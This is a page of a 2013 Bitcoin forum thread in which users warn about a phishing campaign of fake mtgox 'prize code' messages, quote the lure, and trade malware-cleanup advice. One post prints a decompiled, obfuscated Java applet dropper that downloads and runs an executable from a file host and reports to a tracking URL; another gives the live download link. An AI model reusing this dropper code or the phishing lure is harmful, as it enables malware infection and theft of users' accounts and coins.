Pages:
Author

Topic: Pishing scammer! legitnick! - page 3. (Read 4830 times)

rme
hero member
Activity: 756
Merit: 504
July 04, 2013, 03:57:36 AM
#30
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210
United States    San Francisco    AT&T Internet Services
 AS7132 SBIS-AS AS for SBIS-AS (registered Sep 13, 1996)
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 03:56:30 AM
#29
Change your passwords..
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
July 04, 2013, 03:53:07 AM
#28
I cant believe someone fell for that
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 03:52:35 AM
#27
It looks like he got me, just got e-mail from mtgox on someone trying recover my password.

I have no funds there anyway.

His IP is 99.61.161.210

Best change your passwords preferably on a different PC that you trust  Wink
Meanwhile get the software I mentioned and scan around to be sure theirs no hidden lurkers Cheesy
newbie
Activity: 42
Merit: 0
July 04, 2013, 03:48:39 AM
#26
Yes hes very bad scammer.. Very bad.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 03:45:59 AM
#25
Just did the system recovery to earlier state, hopefully it will help. I have Kaspersky installed and it didn't warn me at all Sad

Well Malware and viruses require different detecting software
Recommend Spybot Search and Destroy and MalwareBytes Anti-Malware if you don't have them yet
Maybe even Web of Trust to block at access
Good old Spywareblaster helps too although it doesn't actively do anything just blocks sites
Hope your fine

As for a linux box
Well I don't think it can execute lols
If your worried ClamAv
http://en.wikipedia.org/wiki/Linux_malware#Viruses
legendary
Activity: 1672
Merit: 1010
July 04, 2013, 03:45:25 AM
#24
Quote
Winners are as follows:
Kuriboh
digit
PrintMule
willphase
Equilux
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!

this is the one i got, got my fingers crossed that my system is safe.  might run an antivirus over it later just to be sure.

also these "winners" appear to common to all the pm posted here
Obama
juronimo
albert speer
hurro
bachelor

newbie
Activity: 42
Merit: 0
July 04, 2013, 03:38:52 AM
#23
Dont fall for this kind of stuff.
full member
Activity: 224
Merit: 100
July 04, 2013, 03:36:37 AM
#22
Well, this sucks.  Could have really used that .5 BTC.  Sad

I didn't notice the link to begin with, usually do.  Maybe I'm safe? I did this on a linux box.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 03:20:27 AM
#21
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  URL Suspicious

Can anyone check this please?

Link has malware (Detected on 1)
https://www.virustotal.com/en/url/031e951e605a7ceaddde1c219cbb87dcf236c6fdb925ebb9e1d13c207d0bc121/analysis/
http://www.avgthreatlabs.com/sitereports/domain/rghost.net/

I don't know what the virus is seems to be detected on some virus scanners so try one of those
Worst case Rootkit deletion
Anyways assume infection for now best be safe than sorry not sure if its just on the page or if its installed on pc
Sorry for shotgun detectiving 
newbie
Activity: 42
Merit: 0
July 04, 2013, 03:16:04 AM
#20
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account


It looks like I am in trouble, got winning PM too and downloaded and opened the file from there _>>>  http://pl.rghost.net/47200539?r=2862

Can anyone check this please?
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 03:10:53 AM
#19
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

I'll admit that is weird stuff lot of not scam like posts to boost the count either
But as it stands now he is scamming and so should be banned if it is a hacked account
hero member
Activity: 686
Merit: 504
always the student, never the master.
July 04, 2013, 03:07:12 AM
#18
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.

nah, he's not banned. i just got a pm from him as well. i think he has been hacked though. why would an account with 536 activity start randomly scamming people.
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 03:06:23 AM
#17
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
Duh, he got phished by whoever runs the script.
legendary
Activity: 1652
Merit: 1128
July 04, 2013, 03:04:43 AM
#16
Banned and gave feedback to tank his trust.

In b4 he got 'hacked'.
hero member
Activity: 980
Merit: 500
FREE $50 BONUS - STAKE - [click signature]
July 04, 2013, 03:00:16 AM
#15
Such a nice setup, and so lame execution.

That phishing link could be done much better.

I hope it was worth the trouble, there's plenty of other way to trash your account than this.
hero member
Activity: 490
Merit: 500
July 04, 2013, 02:40:38 AM
#14
I can confirm this as well.  Tried to download, but thankfully my virus scanner caught it as a virus so my computer didn't get infected.
rme
hero member
Activity: 756
Merit: 504
July 04, 2013, 02:31:25 AM
#13
Decompiled Java Applet:

Code:
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.File;
import java.io.FileOutputStream;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.util.Random;

public class Java extends Applet
{
  public String Author = "Created-By-FoxxySoftware|Want more? Visit us at foxxysoftware.blogspot.com!";
  public String[] AAA = { "7-3A3-3T3-3A3-" + "3D3-3P3-3P3-3A1-", "7-3e3-3m3-3o3-3h3-3" + ".3-3r3-3e3-3s3-3u3-1", "7-3r3-3i3-3d3-3p3-3m3-3t3-3.3" + "-3o3-3i3-3.3-3a3-3v3-3a3-3j3-1" };
  public int BBB = 0;
  public String[] CCC = { "\\", "//", Long.toString(Math.abs(new Random().nextLong()), 36) };

  public void init() {
    try {
      for (String str1 : this.AAA) {
        this.AAA[this.BBB] = new StringBuffer(str1).reverse().toString().replaceAll("[".concat("0") + "-".concat("9") + "]", "").replaceAll("-", "");
        String str2 = null;
        if (this.BBB == 0) str2 = System.getenv(this.AAA[this.BBB]); else str2 = System.getProperty(this.AAA[this.BBB]);
        if ((str2 != null) && (new File(str2).exists()) && (new File(str2).canWrite()) && (new File(str2).canExecute()) && (new File(str2).canRead()) && (new File(str2).isDirectory())) {
          this.AAA[0] = str2;
          break;
        }
        this.BBB += 1;
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] == "7-3A3-3".concat("T3-3A3-").toString() + "3D3-3P3-".concat("3P3-3A1-")) {
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
      }
      if (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].endsWith(this.CCC[0])) {
        this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].substring(0, this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].length() - 1);
      }
      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].replaceAll((this.CCC[1] + this.CCC[1].concat("5").concat("$").concat("4")).replaceAll("[".concat("0") + "-".concat("9") + "]", "").toString(), "");
      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] + this.CCC[0] + this.CCC[0] + this.CCC[2].replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + ".exe");

      if (IFK(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString(), this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))], false, getAppletContext(), getDocumentBase()) == true)
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
  }

  public boolean IFK(String paramString1, String paramString2, boolean paramBoolean, AppletContext paramAppletContext, URL paramURL) {
    try {
      FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
      localFileOutputStream.getChannel().transferFrom(Channels.newChannel(new URL(paramString1).openStream()), 0L, 16777216L);
      localFileOutputStream.close();

      if (Runtime.getRuntime().exec(this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))]) != null) {
        new URL("1h3t3t3p3:3/3/3w3w3w3.3s3u3p3e3r3-3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + "1r3a3c3k3e3r3.3n3e3t3/3w7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "").concat(new StringBuilder().append("1t3f3/3c3a3l3l3b3a3c3k3=3g3e3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("1i3p3.3j3s3.3p3h3p3?3u3s7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).toString()).concat(new StringBuilder().append("1e3r3n3a3m3e3=7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("bongwater").append("&website=").toString()) + paramURL.toString().concat("&type=1&download=").concat(new StringBuilder().append(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString()).append("&").append("exploit=0").toString())).openStream();

        if (paramBoolean == true) {
          paramAppletContext.showDocument(new URL(""), "");
        }
      }
      else if (paramBoolean == true) {
        paramAppletContext.showDocument(new URL(""), "");
      }

      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    } catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    return true;
  }
}


Virustotal Scan of a Executable that tries to download:
https://www.virustotal.com/es/file/79dabdcac50bdb5219906cfee9e1dd12ddc67106cd34867c08cfe14c8561ac83/analysis/1372922774/
full member
Activity: 121
Merit: 100
July 04, 2013, 02:18:52 AM
#12
Yep, I got the same PM a little while ago. Noticed the jacked up htpps and then checked the link and noticed it was mtqox and not mtgox. I never clicked on the link. Did a little check on google and saw the java.jar and decided to not even attempt to go to the site.
newbie
Activity: 54
Merit: 0
July 04, 2013, 02:08:25 AM
#11
Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???

You can update his trust rating at least for the moment Smiley

Cheers

Done.
Pages:
Jump to: